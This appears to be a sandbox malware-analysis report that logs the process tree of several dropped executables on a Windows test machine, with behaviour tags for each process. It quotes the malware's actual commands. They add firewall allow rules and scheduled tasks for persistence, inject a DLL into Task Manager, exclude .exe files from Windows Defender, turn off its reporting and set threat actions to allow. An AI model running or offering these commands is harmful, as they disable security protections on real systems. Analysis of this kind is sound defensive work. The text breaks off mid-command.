C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5344
-
-
-
-
-
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2812
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5160
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:6104
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3776
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:3960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3176
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5724
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5468
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2464 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:5968
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:5448
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 6165⤵
- Program crash
PID:100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 6485⤵
- Program crash
PID:4480
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 8844⤵
- Program crash
PID:1208
-
-
-
C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 11564⤵
- Program crash
PID:4856
-
-
-
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4948
-
-
-
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2004
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4008
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
-
C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:440
-
-
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exeC:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6deae1a8,0x6deae1b4,0x6deae1c04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4424
-
-
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142129" --session-guid=647b75d8-1d1a-401a-8239-98e5764e4505 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B0050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:3096 -
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exeC:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d52e1a8,0x6d52e1b4,0x6d52e1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3940
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3f0040,0x3f004c,0x3f00585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4440
-
-
-
-
C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"3⤵
- Executes dropped EXE
PID:456 -
C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4912 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5272
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5384
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5184
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5284
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5344
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5516
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDKGtXeHw"6⤵PID:5872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDKGtXeHw"6⤵PID:1484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\kzkUUCH.exe\" id /pNsite_idAWZ 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5696
-
-
-
-
-
-
C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"3⤵
- Executes dropped EXE
PID:5760 -
C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:5996 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:3536 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5164
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5660
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:5676
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5604
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5136
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5208
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5664
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOEzsPtTT" /SC once /ST 10:56:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOEzsPtTT"6⤵PID:5612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOEzsPtTT"6⤵PID:5928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe\" id /WZsite_idxpt 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5648
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe (depth 2, PID 2304)
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 4064)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 4540)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 832 -ip 832

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 2668)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 3532)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5084 -ip 5084

C:\Windows\system32\svchost.exe (depth 1, PID 2668)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe (depth 1, PID 1932)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 4540)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1464 -ip 1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1, PID 5972)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (the -EncodedCommand value decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, matching the gpupdate.exe child below)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\gpupdate.exe (depth 2, PID 4016)
  "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1, PID 3896)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\gpupdate.exe (depth 2, PID 6032)
  "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WerFault.exe (depth 1, PID 3452)
  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 856 -ip 856

C:\Windows\system32\gpscript.exe (depth 1, PID 5356)
  gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe (depth 1, PID 5432)
  gpscript.exe /RefreshSystemParam

C:\Windows\windefender.exe (depth 1, PID 5296)
  C:\Windows\windefender.exe
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe (depth 1, PID 5616)
  C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe id /WZsite_idxpt 385118 /S
  - Executes dropped EXE
  - Drops file in System32 directory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 4796)
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 